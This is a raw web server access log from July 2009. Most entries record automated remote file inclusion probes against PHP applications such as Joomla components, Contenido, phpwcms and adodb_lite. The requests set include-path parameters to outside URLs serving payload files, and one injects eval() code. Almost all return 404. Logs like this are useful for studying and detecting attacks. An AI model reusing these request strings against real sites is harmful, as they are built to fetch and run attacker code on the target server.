125.243.207.199 - - [17/Jul/2009:04:16:41 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:04:16:41 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
204.30.3.225 - - [17/Jul/2009:04:16:47 -0400] "GET /logs/access_log.Q109061000//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:04:16:47 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.18.63.194 - - [17/Jul/2009:04:17:00 -0400] "GET /logs/access_log.Q109070800%20%20//index.php?option=com_contact&catid=21&Itemid=3//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:04:18:02 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.72.116.39 - - [17/Jul/2009:04:18:31 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
209.59.12.99 - - [17/Jul/2009:04:19:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.11.230.36 - - [17/Jul/2009:04:20:45 -0400] "GET /logs/access_log.Q109052900/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
66.11.230.36 - - [17/Jul/2009:04:20:45 -0400] "GET /logs/access_log.Q109070300/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.12.17.218 - - [17/Jul/2009:04:20:51 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_contact&catid=21&Itemid=3//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://nubsghana.org/templates/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
76.12.17.218 - - [17/Jul/2009:04:21:00 -0400] "GET /logs/access_log.Q109062100//index.php?option=com_contact&catid=21&Itemid=3//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://nubsghana.org/templates/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
76.12.17.218 - - [17/Jul/2009:04:21:19 -0400] "GET /logs/error_log.Q109053100//index.php?option=com_contact&catid=21&Itemid=3//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://nubsghana.org/templates/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:04:22:14 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.243.207.199 - - [17/Jul/2009:04:22:14 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:04:22:32 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:04:22:32 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:04:22:37 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:04:22:38 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:24:33 -0400] "GET //contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:24:33 -0400] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:24:38 -0400] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:24:38 -0400] "GET //contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:24:38 -0400] "GET /logs/access_log.Q109061300//contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:24:38 -0400] "GET /logs/access_log.Q109061300//contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:04:24:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
75.24.67.159 - - [17/Jul/2009:04:25:10 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; msn OptimizedIE8;ENUS)"
75.24.67.159 - - [17/Jul/2009:04:25:10 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; msn OptimizedIE8;ENUS)"
75.24.67.159 - - [17/Jul/2009:04:25:11 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; msn OptimizedIE8;ENUS)"
75.24.67.159 - - [17/Jul/2009:04:25:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; msn OptimizedIE8;ENUS)"
65.23.158.226 - - [17/Jul/2009:04:25:39 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
65.23.158.226 - - [17/Jul/2009:04:25:39 -0400] "GET /logs/access_log.Q109052900/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
65.23.158.226 - - [17/Jul/2009:04:25:40 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
195.186.64.207 - - [17/Jul/2009:04:26:12 -0400] "GET /logs/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
195.186.64.207 - - [17/Jul/2009:04:26:13 -0400] "GET /errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
195.186.64.207 - - [17/Jul/2009:04:26:13 -0400] "GET /logs/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
195.186.64.207 - - [17/Jul/2009:04:26:13 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
195.186.64.207 - - [17/Jul/2009:04:26:14 -0400] "GET /errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
195.186.64.207 - - [17/Jul/2009:04:26:14 -0400] "GET /logs/access_log.Q109060400/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
195.186.64.207 - - [17/Jul/2009:04:26:32 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
195.186.64.207 - - [17/Jul/2009:04:26:35 -0400] "GET /logs/access_log.Q109053000/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [17/Jul/2009:04:27:11 -0400] "GET /logs/access_log.Q109060200/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
65.23.158.226 - - [17/Jul/2009:04:27:25 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
65.23.158.226 - - [17/Jul/2009:04:27:25 -0400] "GET /logs/access_log.Q109060600/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
65.23.158.226 - - [17/Jul/2009:04:27:25 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
118.129.166.129 - - [17/Jul/2009:04:27:32 -0400] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:04:27:32 -0400] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:04:27:33 -0400] "GET /logs/access_log.Q109060600%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
65.23.158.226 - - [17/Jul/2009:04:27:42 -0400] "GET /logs/access_log.Q109060600/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
67.18.63.194 - - [17/Jul/2009:04:27:46 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_contact&catid=21&Itemid=3//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.18.63.194 - - [17/Jul/2009:04:27:47 -0400] "GET /logs/access_log.Q109062100//index.php?option=com_contact&catid=21&Itemid=3//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:29:04 -0400] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:29:04 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:29:04 -0400] "GET //contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [17/Jul/2009:04:29:07 -0400] "GET /logs/access_log.Q109052100/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
118.129.166.129 - - [17/Jul/2009:04:29:11 -0400] "GET /logs/access_log.Q109052100%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
65.23.158.226 - - [17/Jul/2009:04:29:12 -0400] "GET /logs/access_log.Q109052100/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 271 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
61.78.62.84 - - [17/Jul/2009:04:29:13 -0400] "GET //contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:29:13 -0400] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:29:13 -0400] "GET /logs/access_log.Q109061300%20%20//contenido/external/frontend/news.php?cfg[path][includes]=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
195.186.64.207 - - [17/Jul/2009:04:29:47 -0400] "GET /logs/access_log.Q109060100/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:04:29:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.186.64.207 - - [17/Jul/2009:04:30:02 -0400] "GET /logs/access_log.Q109060100/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:04:33:05 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:04:33:05 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:04:33:18 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:04:33:18 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:04:33:18 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
210.205.57.2 - - [17/Jul/2009:04:33:37 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.nakjimadang.com/ams/amboard/upload/satu.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.253.240.80 - - [17/Jul/2009:04:34:11 -0400] "GET /includes/kb_constants.php?module_root_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
89.253.240.80 - - [17/Jul/2009:04:34:11 -0400] "GET /logs/includes/kb_constants.php?module_root_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
89.253.240.80 - - [17/Jul/2009:04:34:11 -0400] "GET /logs/access_log.Q109061500/includes/kb_constants.php?module_root_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
220.79.47.122 - - [17/Jul/2009:04:34:43 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tymwb.co.kr/bbs/skin_shop/standard/2_view_body/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.79.47.122 - - [17/Jul/2009:04:34:43 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tymwb.co.kr/bbs/skin_shop/standard/2_view_body/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.79.47.122 - - [17/Jul/2009:04:34:43 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tymwb.co.kr/bbs/skin_shop/standard/2_view_body/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.79.47.122 - - [17/Jul/2009:04:34:43 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tymwb.co.kr/bbs/skin_shop/standard/2_view_body/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jul/2009:04:34:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.103.16.12 - - [17/Jul/2009:04:34:57 -0400] "GET /logs/access_log.Q109061500/includes/kb_constants.php?module_root_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
200.103.16.12 - - [17/Jul/2009:04:34:57 -0400] "GET /logs/includes/kb_constants.php?module_root_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
200.103.16.12 - - [17/Jul/2009:04:34:57 -0400] "GET /includes/kb_constants.php?module_root_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
89.253.240.80 - - [17/Jul/2009:04:34:57 -0400] "GET /logs/error_log.Q109061500/includes/kb_constants.php?module_root_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
206.225.23.4 - - [17/Jul/2009:04:35:05 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:04:35:05 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:35:13 -0400] "GET //pollphp/db//booth.php?include_path=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:35:14 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:35:14 -0400] "GET /logs/access_log.Q109051800//pollphp/db//booth.php?include_path=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:35:22 -0400] "GET //pollphp/db//booth.php?include_path=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:35:22 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:35:22 -0400] "GET /logs/access_log.Q109051800//pollphp/db//booth.php?include_path=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.198.76.196 - - [17/Jul/2009:04:35:26 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.65"
213.198.76.196 - - [17/Jul/2009:04:35:27 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
213.198.76.196 - - [17/Jul/2009:04:35:27 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.nakjimadang.com/ams/amboard/upload/ec.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
206.225.23.4 - - [17/Jul/2009:04:35:32 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [17/Jul/2009:04:35:32 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.129.166.129 - - [17/Jul/2009:04:35:36 -0400] "GET /logs/access_log.Q109052100/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:35:36 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:35:37 -0400] "GET //pollphp/db//booth.php?include_path=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.78.62.84 - - [17/Jul/2009:04:35:39 -0400] "GET /logs/access_log.Q109051800%20%20//pollphp/db//booth.php?include_path=http://bizadmin.hongik.ac.kr//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
220.79.47.122 - - [17/Jul/2009:04:35:41 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.79.47.122 - - [17/Jul/2009:04:35:41 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.79.47.122 - - [17/Jul/2009:04:35:41 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.79.47.122 - - [17/Jul/2009:04:35:41 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.dwno.or.kr/bbs/memo_images/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.103.16.12 - - [17/Jul/2009:04:35:43 -0400] "GET /logs/error_log.Q109061500/includes/kb_constants.php?module_root_path=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
219.85.63.226 - - [17/Jul/2009:04:35:59 -0400] "GET //?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
219.85.63.226 - - [17/Jul/2009:04:35:59 -0400] "GET /logs//?_zb_path=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 200 9865 "-" "Mozilla/5.0"
24.10.31.200 - - [17/Jul/2009:04:36:00 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 125946 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/530.19.2 (KHTML, like Gecko)"
220.79.47.122 - - [17/Jul/2009:04:36:08 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tymwb.co.kr/bbs/skin_shop/standard/2_view_body/uiu.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.79.47.122 - - [17/Jul/2009:04:36:08 -0400] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tymwb.co.kr/bbs/skin_shop/standard/2_view_body/uiu.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
220.79.47.122 - - [17/Jul/2009:04:36:08 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tymwb.co.kr/bbs/skin_shop/standard/2_view_body/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.79.47.122 - - [17/Jul/2009:04:36:09 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.tymwb.co.kr/bbs/skin_shop/standard/2_view_body/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
